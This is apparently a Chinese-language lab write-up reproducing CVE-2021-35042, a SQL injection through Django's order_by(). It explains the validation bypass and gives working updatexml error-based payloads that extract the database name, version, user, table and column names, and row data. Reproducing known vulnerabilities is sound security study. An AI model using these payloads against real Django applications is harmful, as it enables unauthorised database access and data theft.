【CVE-2021-35042】django order_by()函数 存在的SQL注入漏洞复现

【CVE-2021-35042】django order_by()函数 存在的SQL注入漏洞复现

环境

• python：3.10
• mysql：5.7.36 （8.0.26版本有些信息无法显示）
• django：3.1.1

原理

输入检测存在漏洞

编写使用函数order_by()的代码

order_by()函数的执行过程如下，其中add_ordering为根据传入的field_names添加排序规则

如果输入的参数存在"."，则直接continue跳出路径检测names_to_path，这就是漏洞所在

漏洞利用相关知识

updatexml函数是用于更新xml格式的数据指定

updatexml(xml_doument,XPath_string,new_value)
第一个参数：XML_document是String格式，替换的列名
第二个参数：XPath_string (Xpath格式的字符串) ，指明要替换的是哪一块数据
第三个参数：new_value，String格式，替换查找到的符合条件的数据

如果输入的参数不符合规则，则会报错

SQL注入

1. 首先，需要知道排序的字段名，随便输入列名，即可得到所有的列名
   
2. 构造如下请求获取数据库名

.name) and updatexml(name,concat(0x7e,(select database()),0x7e),1)%23

分析

• .name用户绕过合法性检测
• 右括号用于闭合order by查询语句
• and用于连接order by的其它条件，此处需要特别注意，网上很多直接用的分号，但是我这里用分号，相当于一个query查询里面有两个SQL语句需要执行，会报语法错误，用and连接则不会报错。
• updatexml用于报错回显，这里能这样使用的原因是order by后面可以跟表达式或者函数
• updatexml第一个参数，是要更新的列名
• 第二个参数，使用concat连接出一个字符串，个人认为这句话的执行顺序为：先执行select database()得到数据库名，然后再和左右两边的数据进行拼接，由于0x7e是‘~’，是不合法字符，所以会报错，回显所有不合法的数据，数据库名也在其中
• 第三个参数，要替换的内容，不重要
• %23是“#”，用于注释掉后面的内容

SQL注入结果如下
1. 数据库名

2. 版本号
version()或@@version

3. 用户信息
user()

4. 根目录
@@basedir

5. 表名
尝试爆破表名的时候发现使用语句不报错

.name) and updatexml(name,concat(0x7e,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE table_schema=DATABASE()),0x7e),1)#) ASC

尝试了很多次之后发现把and换成or即可成功

因为updatexml回显报错信息长度有限制，所以添加上limit条件，并去掉group_concat

.name) or updatexml(name,concat(0x7e,(SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 10,1),0x7e),1)%23

可以发现test数据库下第11张表为student

6. 列名
相同的方式，换一下查询条件

SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE table_schema='test' AND table_name='student' LIMIT 1,1

可以获取test数据库的student表的第二列列名为name

7. 表中存储的数据
   现在数据库名、表名、列名都已经知道了，换一下select条件

SELECT name FROM test.student LIMIT 0,1

即可获取表中所有内容